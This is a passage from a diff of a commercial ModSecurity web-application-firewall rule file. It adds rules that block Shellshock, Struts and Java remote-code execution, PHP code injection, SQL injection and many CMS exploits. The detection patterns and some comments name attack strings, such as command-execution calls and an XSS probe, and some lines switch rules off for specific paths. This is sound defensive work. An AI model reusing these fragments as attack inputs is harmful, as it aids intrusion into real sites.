+SecRule REQUEST_FILENAME "/gestor/download\.php" "phase:2,id:95352,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=314001"
+
+SecRule REQUEST_FILENAME "/admindau/" "phase:2,id:95353,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390630"
+
+SecRule REQUEST_FILENAME "/uos\.cgi" "phase:2,id:95354,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390761"
+
+SecRule REQUEST_FILENAME "/clientes/index\.php" "phase:2,id:95355,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390552"
+
+SecRule REQUEST_FILENAME "/clientshosting\.php" "phase:2,id:95356,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390552"
+
+SecRule REQUEST_FILENAME "/import\.php" "phase:2,id:95357,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393449"
+
+SecRule REQUEST_FILENAME "/members/login\.php" "phase:2,id:95358,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390552"
+
+SecRule REQUEST_FILENAME "/forum/viewtopic\.php" "phase:2,id:95359,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390439"
+
+SecRule REQUEST_FILENAME "/wp-admin/admin-ajax\.php" "phase:2,id:95360,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=303669"
+
+SecRule REQUEST_FILENAME "/previewemail\.php" "phase:2,id:95361,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=381239"
+
+SecRule REQUEST_FILENAME "/wp-admin/post\.php" "phase:2,id:95362,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=331702"
+
+SecRule REQUEST_FILENAME "/wp-admin/admin-ajax\.php" "phase:2,id:95363,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=331702"
+
+SecRule REQUEST_FILENAME "/admin/moduleinterface\.php" "phase:2,id:95364,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=331702"
+
+SecRule REQUEST_FILENAME "/sendy/includes/list/edit\.php" "phase:2,id:95365,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=331702"
+
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Virtual Just In Time Patches for Vulnerable Applications Rules
+# for modsec 2.9.3 and up
+#
+# Copyright 2005-2024 by Atomicorp, Inc., all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS and CONTRIBUTORS AS IS
+# and ANY EXPRESS or IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY and FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER or CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, or
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS or SERVICES; LOSS OF USE, DATA, or PROFITS; or BUSINESS
+# INTERRUPTION) HOWEVER CAUSED and ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, or TORT (INCLUDING NEGLIGENCE or OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+
+
+#--------------------------------
+# notes
+#--------------------------------
+
+
+#--------------------------------
+#start rules
+#--------------------------------
+# Phase 2 rules
+#
+
+
+#Bash attacks
+SecRule REQUEST_HEADERS|FILES_NAMES|ARGS|ARGS_NAMES|!ARGS:/msg/|!ARGS:/message/|!ARGS:/txt/|!ARGS:/text/ "^ ?\( ?\) ?{" "phase:1,deny,id:330701,rev:3,severity:1,t:none,t:urlDecodeUni,t:compressWhiteSpace,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: CVE-2014-6271 Bash Attack'"
+
+SecRule REQUEST_LINE "^ ?\( ?\) ?{" "phase:1,deny,id:330702,rev:3,severity:1,t:none,t:compressWhiteSpace,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: CVE-2014-6271 Bash Attack'"
+
+#moved from embargoed rules Nov15 2024
+SecRule REQUEST_URI "/wp-json/reallysimplessl/v1/two_fa/skip_onboarding"  "id:331704,phase:2,deny,status:403,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules: Really Simple SSL authentication bypass attack',severity:1,rev:12,log,auditlog,chain"
+SecRule &ARGS:user_id "@ge 1" "t:none,chain"
+SecRule &ARGS:login_nonce "@ge 1" "t:none,chain"
+SecRule &ARGS:redirect_to "@ge 1" "t:none"
+
+
+#Moved from embargoed rules Jan 3 2022
+SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|!ARGS:email_text|!ARGS:/message/|!ARGS:FormLayout|!ARGS:/svg/|!ARGS:/template/|!ARGS:/translate/|!ARGS:mepr-emails|!ARGS:wcf_email_body|!ARGS:/content/ "@rx [\"'`][\[\{].*[\]\}][\"'`].*(::.*jsonb?)?.*(?:(?:@|->?)>|<@|\?[&\|]?|#>>?|[<>]|<-)|(?:(?:@|->?)>|<@|\?[&\|]?|#>>?|[<>]|<-)[\"'`][\[\{].*[\]\}][\"'`]|json_extract.*\(.*\)" "id:331702,phase:2,deny,status:403,t:none,t:urlDecodeUni,t:lowercase,t:removeWhitespace,msg:'Atomicorp.com WAF Rules: Possible JSON-Based SQL Injection',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'SQLi',severity:1,rev:12,log,auditlog"
+
+#/editBlackAndWhiteList
+SecRule REQUEST_URI "editBlackAndWhiteList" "id:394669,phase:2,t:none,deny,auditlog,log,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API RCE attempt blocked',rev:1,severity:2"
+
+#Known malware sign1
+SecRule ARGS_NAMES "^(?:e44e|wowex)$" "phase:2,deny,status:403,id:334071,rev:2,severity:1,t:none,t:compressWhiteSpace,t:lowercase,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: Known PHP code injection Attack'"
+
+#Known malware sign1
+#SecRule ARGS_NAMES "miglaa_update_(?:me|arr|barinfo)"
+#SecRule ARGS_NAMES "miglaa_(?:update|stripe|sync)_"
+SecRule ARGS_NAMES|ARGS:action "miglaa?_" "phase:2,deny,status:403,id:334072,rev:5,severity:1,t:none,t:urlDecodeUni,t:lowercase,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: CVE-2019-6703 Attack blocked'"
+
+#vulnerability scanner
+SecRule ARGS "\'\|\|\'" "phase:2,deny,status:403,id:334073,rev:1,severity:1,t:none,t:urlDecodeUni,t:removewhitespace,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: Injection Attack blocked'"
+
+#CryptoPHP
+SecRule REQUEST_METHOD "@streq POST" "chain,id:394667,phase:2,t:none,deny,auditlog,log,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible CryptoPHP backdoor attempt',rev:1,severity:2"
+SecRule REQUEST_HEADERS:Content-Disposition "form-data; name ?= ?\"?serverkey" "t:none,t:lowercase,t:compressWhiteSpace,chain"
+SecRule REQUEST_HEADERS:Content-Disposition "form-data; name ?= ?\"?data" "t:none,t:lowercase,t:compressWhiteSpace,chain"
+SecRule REQUEST_HEADERS:Content-Disposition "form-data; name ?= ?\"?key" "t:none,t:lowercase,t:compressWhiteSpace,chain"
+SecRule &REQUEST_HEADERS:User-Agent "@eq 0" "t:none"
+
+SecRule REQUEST_METHOD "@streq POST" "chain,id:394666,phase:2,t:none,deny,auditlog,log,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible CryptoPHP backdoor attempt',rev:1,severity:2"
+SecRule &REQUEST_HEADERS:serverKey "@eq 1" "t:none,chain"
+SecRule &REQUEST_HEADERS:data "@eq 1" "t:none,chain"
+SecRule &REQUEST_HEADERS:key "@eq 1" "t:none,chain"
+SecRule &REQUEST_HEADERS:User-Agent "@eq 0" "t:none"
+
+SecRule REQUEST_URI "@pm .bat .cmd" "id:357876,phase:2,t:none,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:359931,t:none,pass,nolog,noauditlog,skipAfter:END_RFD"
+
+#RFD attacks
+SecRule REQUEST_URI "@rx (?i:^[^?]*\.(?:bat|cmd)(?: |$))" "phase:2,id:312863,t:none,t:urlDecodeUni,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Potential Reflected File Download (RFD) Attack.'"
+
+SecMarker END_RFD
+
+#Struts RCE attack
+SecRule REQUEST_URI|ARGS|XML:/*|REQUEST_HEADERS:Content-Type "@pm inputstream ognl sun.misc opensymphony beanmap utility.execute allowstaticmethodaccess memberaccess cmd getparameter runtime unmarshaller java base64 org.apache.tomcat" "phase:2,id:368829,t:none,t:urlDecodeUni,multimatch,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:361112,t:none,pass,nolog,noauditlog,skipAfter:END_STRUTS"
+
+#CVE-2020-17530
+SecRule REQUEST_URI "\.action" "chain,phase:2,status:403,deny,log,auditlog,id:339207,rev:1,severity:2,t:none,t:urlDecodeUni,t:lowercase,multimatch,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Struts CVE-2020-17530 RCE attack blocked'"
+SecRule ARGS|XML:/* "(?:collections\.beanmap|template\.utility\.execute)" "t:none,t:urlDecodeUni,t:lowercase,multimatch"
+
+#java.lang.Runtime@getRuntime().exec
+SecRule REQUEST_URI "\.action" "chain,phase:2,status:403,deny,log,auditlog,id:337207,rev:4,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Java RCE attack blocked'"
+SecRule ARGS|XML:/* "(?:java\.lang\.runtime@getruntime\(\)\.exec\(|com\.opensymphony\.xwork)" "t:none,t:urlDecodeUni,t:lowercase"
+
+SecRule ARGS|XML:/* "(?:sun\.misc\.base64decoder|unmarshaller\.base64data|java.lang.runtime.{1,200}exec\()" "chain,phase:2,status:403,deny,log,auditlog,id:337206,rev:8,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Struts RCE attack blocked'"
+SecRule ARGS|XML:/* "javax?\.(?:io\.fileoutputstream|imageio\.spi\.|lang\.processbuilder)" "t:none,t:lowercase,t:urlDecodeUni"
+
+SecRule ARGS|XML:/* "\${\(\#_memberaccess\[\"allowstaticmethodaccess" "phase:2,status:403,deny,log,auditlog,id:337208,rev:6,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Struts RCE attack blocked'"
+
+SecRule ARGS|XML:/* "(?:java\.lang\.runtime.{1,200}exec\(|request\.getparameter\(\"cmd\")" "phase:2,status:403,deny,log,auditlog,id:337210,rev:8,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Java RCE attack blocked'"
+
+SecRule ARGS|XML:/*|REQUEST_HEADERS:Content-Type "\)\.\(#cmd=\'" "phase:2,status:403,deny,log,auditlog,id:337218,rev:1,severity:2,t:none,t:urlDecodeUni,t:lowercase,t:removewhitespace,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Struts RCE attack blocked'"
+
+SecRule REQUEST_URI|ARGS|XML:/* "java\.(?:lang|util)" "chain,phase:2,status:403,deny,log,auditlog,id:337211,rev:4,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134) blocked'"
+SecRule REQUEST_URI|ARGS|XML:/* "(?:getinputstream|getruntime\(\)\.exec)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase"
+
+#Generic java code injection
+SecRule REQUEST_URI|ARGS|XML:/* "javax?\.(?:lang|util|script)" "chain,phase:2,status:403,deny,log,auditlog,id:337209,rev:5,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Java remote code injection blocked'"
+SecRule REQUEST_URI|ARGS|XML:/* "(?:p\.command\((\'cmd|[cbd]?a?sh)|base64\.decoder\(\)\.decode|getinputstream|getruntime\(\)\.exec\(|processbuilder\(\)\.command|nio\.file\.files)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,t:removewhitespace"
+
+SecMarker END_STRUTS
+
+
+#RCE Joomla rule not needed
+#Only added to give more information to the threat intelligence system that this was specifically a Joomla RCE attack
+
+#Rule 347195 already protected against this vulnerability
+SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:X_FORWARDED_FOR|ARGS:filter-search  "(?:drivermysql|jfactory|databasedriver|(}_|^\:))" "phase:2,status:403,deny,log,auditlog,id:337106,rev:2,severity:2,t:none,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla RCE attack blocked'"
+
+SecRule REQUEST_HEADERS:Referer  "^{_.*(?:databasedriver|drivermysql|jfactory)" "phase:2,status:403,deny,log,auditlog,id:337107,rev:2,severity:2,t:none,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla RCE attack blocked'"
+
+#Moved to JITP rules from generic rules to trigger after 337106 so the TI can see specific cases of joomla only RCE attacks
+SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:X_FORWARDED_FOR "@pm php chr fopen fwrite globals system passthru serialize include php_uname popen proc_open mysql_query exec eval proc_nice proc_terminate proc_get_status proc_close pfsockopen leak apache_child_terminate posix_kill posix_mkfifo posix_setpgid posix_setsid posix_setuid phpinfo preg_ decode_base64 base64_decode base64_url_decode rot13 <? mfunc mclude dynamic-cached-content" "phase:2,id:337829,t:none,t:urlDecodeUni,t:removeComments,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:391023,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_UA_1"
+
+SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:X_FORWARDED_FOR "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|\b(?:passthru|serialize|php_uname|phpinfo|shell_exec|preg_\w+|mysql_query|exec|eval|base64_decode|decode_base64|rot13|base64_url_decode)\b ?(?:\(|\:)|\b(?:system|include)\b ?\((?:\'|\"|\$))" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,id:347195,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: PHP function in HTTP header attack blocked'"
+SecMarker END_PHP_CODE_INJECTION_ATTACKS_UA_1
+
+#wp-json/mpp-v2/get_users
+#user_pass
+SecRule REQUEST_URI "wp-json/mpp/v2/" "chain,deny,log,auditlog,phase:4,t:none,t:urlDecodeUni,t:lowercase,ctl:auditLogParts=+E,auditlog,severity:'2',rev:1,status:404,msg:'Atomicorp.com WAF Rules:  User Profile Picture Plugin Leak Prevented',id:'380115'"
+SecRule RESPONSE_BODY "user_pass" "t:none"
+
+
+
+SecRule REQUEST_FILENAME "\.(?:(?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df|s)|gif|js|css|ico|avi|w(?:mv|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|doc|xls|od(?:t|s)|ppt|wbk)$" "phase:2,pass,t:none,t:lowercase,nolog,noauditlog,id:333863,skipAfter:END_JITP"
+
+SecRule REQUEST_URI "^/eprocservice/supplierinboundservice" "phase:2,pass,t:none,t:lowercase,nolog,noauditlog,id:373863,skipAfter:END_JITP_SPECIAL"
+
+#big-ip
+SecRule REQUEST_URI "/mgmt/tm/util" "id:392767,phase:2,t:none,t:urlDecodeUni,t:lowercase,deny,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible BIG_IP attack',rev:2,severity:1"
+
+#X3CSCRIPT SRC
+#not really necessary but some poorly written vulnerability scanners think this works
+SecRule REQUEST_URI|ARGS "X3C ?SCRIPT SRC" "id:392765,phase:2,t:none,t:removecomments,t:compressWhiteSpace,deny,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Naive Java application cross scripting attack ',rev:2,severity:2"
+
+#?gf_page=upload
+#file_name *php*
+SecRule REQUEST_URI "\?gf_page=upload" "chain,id:393664,phase:2,t:none,t:lowercase,deny,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Gravity Forms upload attack',rev:2,severity:2"
+SecRule ARGS:file_name "\.(?:p(?:hp|html)|txt)" "t:none,t:lowercase"
+
+SecRule REQUEST_FILENAME "/cmdownload/" "id:322292,phase:2,t:none,t:UrlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:327222,t:none,pass,nolog,noauditlog,skipAfter:END_CMDOWNLOAD"
+
+#/cmdownloads/?CMDsearch=".
+SecRule REQUEST_URI "/cmdownloads/\?cmdsearch=\"\." "id:393663,phase:2,t:none,t:UrlDecodeUni,t:lowercase,deny,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Wordpress CM Download Manager RCE attempt',rev:1,severity:2"
+
+SecRule REQUEST_FILENAME "/cmdownload/add/" "chain,id:322272,rev:3,phase:2,t:none,t:UrlDecodeUni,t:normalizePath,t:lowercase,deny,status:403,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: cmdownload XSS attack (CVE-2020-27344)',severity:2"
+SecRule REQUEST_HEADERS:Content-Disposition "filename=\"[^\<]{0,32}\<"  "t:none,t:UrlDecodeUni,t:lowercase"
+
+
+SecMarker END_CMDOWNLOAD
+
+SecRule REQUEST_URI "node" "chain,id:391235,deny,status:403,phase:2,t:none,t:urlDecodeUni,t:lowercase,t:removecomments,t:compressWhiteSpace,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drupal pre-auth SQL injection attack',rev:8,severity:1"
+SecRule ARGS|ARGS_NAMES|!ARGS:/^field_aut_content/ "(?:update {?users}? set|insert into {?users}?|concat ?\(|truncate table)"
+
+# Legacy - SCRIPT_BASENAME is no longer supported
+#SecRule SCRIPT_BASENAME "^(index\.php)?$" #"chain,id:391236,deny,status:403,phase:2,t:none,t:urlDecodeUni,t:lowercase,t:removecomments,t:compressWhiteSpace,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drupal pre-auth SQL injection attack',rev:1,severity:1"
+#SecRule ARGS:form_id "^user_login_block$" "chain,t:none,t:lowercase"
+#SecRule ARGS_NAMES "^name\[" "t:none,t:lowercase"
+
+#SecRule REQUEST_URI "node" #"chain,id:391234,deny,status:403,phase:2,t:none,t:urlDecodeUni,t:lowercase,t:removecomments,t:compressWhiteSpace,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drupal pre-auth SQL injection attack',rev:4,severity:1"
+#SecRule ARGS_NAMES "(?:update {?users}? set|insert into {?users}?|concat ?\(|trucate)"
+
+
+SecRule REQUEST_HEADERS:Referer "@pm semalt.com savetubevideo.com srecorder.com kambasoft.com fbdownloader.com musicas-gratis.com for-website.com best-seo-solution.com social-buttons.com" "id:337876,phase:2,t:none,pass,nolog,noauditlog,skip:1"
+                SecAction "phase:2,id:319931,t:none,pass,nolog,noauditlog,skipAfter:END_SEMALT"
+
+SecRule REQUEST_HEADERS:Referer "(?:\.(?:s(?:emalt|avetubevideo|recorder)|kambasoft|fbdownloader)|-musicas-gratis|best-seo-solution|buttons?-for-websites?|social-buttons)\.com" "id:393766,phase:2,t:none,t:lowercase,deny,status:403,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: semalt.com bot attempt',rev:8,severity:3,tag:'no_ar'"
+
+SecMarker END_SEMALT
+
+#WP brute force DOS attack
+#/?3162504=9747583
+SecRule REQUEST_URI "/\?[0-9]{7}=[0-9]{7}" "phase:2,t:none,log,deny,auditlog,status:403,id:393669,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible DOS attack',t:none"
+
+#Joomla zero day
+SecRule ARGS:option "@streq com_media" "id:384545,severity:2,rev:1,phase:2,t:none,log,auditlog,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla Media Manager File Upload Bypass Attack',tag:'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads',chain"
+SecRule FILES_NAMES "@endsWith ."
+
+#PHP code injection
+#<!--mfunc
+SecRule ARGS "< ?\!--{,100}.(?:m(?:func|clude)|dynamic-cached-content) " "phase:2,log,deny,auditlog,status:403,id:393665,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:Possible W3TC and WP Super Cache PHP Code injection attempt',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
+
+#Roundcube
+#referrer: &_value=config/db.inc.php
+SecRule REQUEST_HEADERS:REFERER "&_value=config/(?:db|main)\.inc\.php" "phase:2,status:403,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:378492,rev:7,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Roundcube LFI vulnerablity'"
+
+#.stfi.re/ unauthorized proxing
+SecRule REQUEST_HEADERS:REFERER "\.stfi\.re/" "phase:2,status:403,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:378497,rev:7,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Unauthorized Proxying of Website by .stfi.re'"
+
+SecRule REQUEST_FILENAME "\.(?:pl|asp|exe|(?:tt|wof)f)$" "phase:2,pass,t:none,t:lowercase,nolog,noauditlog,id:333864,skipAfter:END_PHP_CGI_BUG"
+
+#Generic PHP CGI mode exploit
+#Contact Form 7
+SecRule REQUEST_URI "^/\?-s&_wpcf7_is_ajax_call" "phase:2,pass,t:none,t:lowercase,nolog,noauditlog,id:353864,skipAfter:END_PHP_CGI_BUG"
+
+SecRule QUERY_STRING "^-a(?:ction=|dmin$)" "phase:2,pass,t:none,t:lowercase,nolog,noauditlog,id:354864,skipAfter:END_PHP_CGI_BUG"
+
+SecRule QUERY_STRING "^-[abcdnrsw]" "phase:2,status:403,log,deny,auditlog,t:none,t:urlDecodeUni,t:removeWhiteSpace,t:lowercase,id:378491,rev:6,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Attempt to Exploit PHP CGI command injection vulnerablity'"
+
+SecRule QUERY_STRING "^(?:%2B|%2b|\+|\s|%20)+?(?:%2d|%2D|-)[abcdnrsw]" "phase:2,status:403,log,deny,auditlog,t:none,t:removeWhiteSpace,id:378371,rev:4,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Attempt to Exploit PHP CGI command injection vulnerablity'"
+
+SecMarker END_PHP_CGI_BUG
+
+
+#ajax/api/hook/decodeArguments
+SecRule REQUEST_URI "ajax/api/hook/decodearguments" "chain,phase:2,status:403,log,deny,auditlog,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:376476,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: VBulleting Code Injection Attack Blocked'"
+SecRule ARGS:arguments "(?:vb_db_result|vb_database|php)" "t:none,t:lowercase,t:removecomments"
+
+#W3TC total cache exploit
+SecRule REQUEST_URI "wp-content/w3tc/dbcache/" "phase:2,status:403,log,deny,auditlog,t:none,t:urlDecodeUni,t:removeWhiteSpace,t:lowercase,id:376416,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: W3 Total Cache vulnerablity'"
+
+#Joomla
+#jform[groups][]=7
+#index.php?option=com_users&view=registration
+#SecRule REQUEST_URI "index\.php"
+SecRule ARGS:option "com_users" "phase:2,log,deny,auditlog,status:403,chain,id:392664,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla Privilige Escalation Vulnerability',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:view "registration" "chain,t:none,t:lowercase"
+SecRule ARGS:/^jform\[groups\]\[\]$/ "^7$"
+
+SecRule REQUEST_URI "component/users/\?(?:task|view)=registration" "phase:2,log,deny,auditlog,status:403,chain,id:392665,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla Privilige Escalation Vulnerability',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:/^jform\[groups\]\[\]$/ "^7$"
+
+#Phase 4 PHP rule
+SecRule REQUEST_FILENAME "/wp-admin/setup-config\.php" "auditlog,chain,phase:4,t:none,t:lowercase,log,deny,auditlog,id:'381211',msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MySQL Server Username/Password Disclosure Vulnerability via \'setup-config.php\' page.',tag:'CVE-2011-4898'"
+SecRule ARGS_GET:step "@streq 2" "chain"
+SecRule RESPONSE_BODY "We were able to connect to the database server \(which means your username and password is okay\) but not able to select the database|This either means that the username and password information in your wp-config.php file is incorrect or we can't contact the database server at" "t:none"
+
+
+#/index.php/admin/Cms_Wysiwyg/
+SecRule REQUEST_URI "/cms_wysiwyg/directive/index/" "phase:2,t:none,t:urlDecodeUni,t:lowercase,log,deny,status:403,auditlog,id:336477,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Magento Shoplift attack'"
+
+#/manager/?a=system.*file=;});alert(1); </script>
+SecRule REQUEST_URI "/manager/\?a=system" "phase:2,t:none,t:urlDecodeUni,t:lowercase,log,deny,status:403,auditlog,id:336478,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ModX Revolution 2.3.5-pl Cross Site Scripting attack',chain"
+SecRule ARGS:file "(?:script|\} ?\) ?\;)" "t:none,t:urlDecodeUni,t:lowercase"
+
+#?gf_page=upload
+SecRule REQUEST_URI "\?gf_page=upload" "chain,capture,phase:2,deny,log,auditlog,id:391742,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Wordpress Gravity Forms 1.8.19 Shell Upload Attack'"
+SecRule ARGS:name "\.ph(?:p|t)" "t:none,t:urlDecodeUni,t:lowercase"
+
+SecRule REQUEST_URI "\?gf_page=upload" "chain,capture,phase:2,deny,log,auditlog,id:391743,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Wordpress Gravity Forms 1.8.19 Shell Upload Attack'"
+SecRule ARGS:gform_unique_id "\.\./\.\." "t:none,t:urlDecodeUni,t:lowercase"
+
+#WP 4.7 exploit
+SecRule REQUEST_URI "/wp/v2/posts/"  "chain,capture,phase:2,deny,log,auditlog,id:390751,rev:2,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress REST API remote code injection attack',logdata:'%{TX.0}'"
+SecRule ARGS:id "!(^[0-9]+$)" "t:none,t:urlDecodeUni"
+
+#WP 4.7 exploit
+SecRule REQUEST_URI "/wp/v2/posts/"  "chain,capture,phase:2,deny,log,auditlog,id:390753,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress REST API remote code injection attack',logdata:'%{TX.0}'"
+SecRule ARGS:id "[a-z]" "t:none,t:urlDecodeUni,t:lowercase"
+
+#/wp-json/wp/v2/posts/2549
+#SecRule REQUEST_URI "/wp/v2/posts/[0-9]+"  "chain,capture,phase:2,deny,log,auditlog,id:390752,rev:3,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress REST API probe',logdata:'%{TX.0}'"
+#SecRule REQUEST_METHOD "GET" "t:none"
+
+#drupal JITPs
+#moved from encrypted embargoed rules
+SecRule REQUEST_FILENAME "(?:index\.php|\/$)" "chain,capture,phase:2,deny,log,auditlog,id:390755,rev:2,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drupal Code Injection attack blocked',logdata:'%{TX.0}'"
+        SecRule REQUEST_METHOD "^(?:GET|POST|HEAD)$" "chain,t:none"
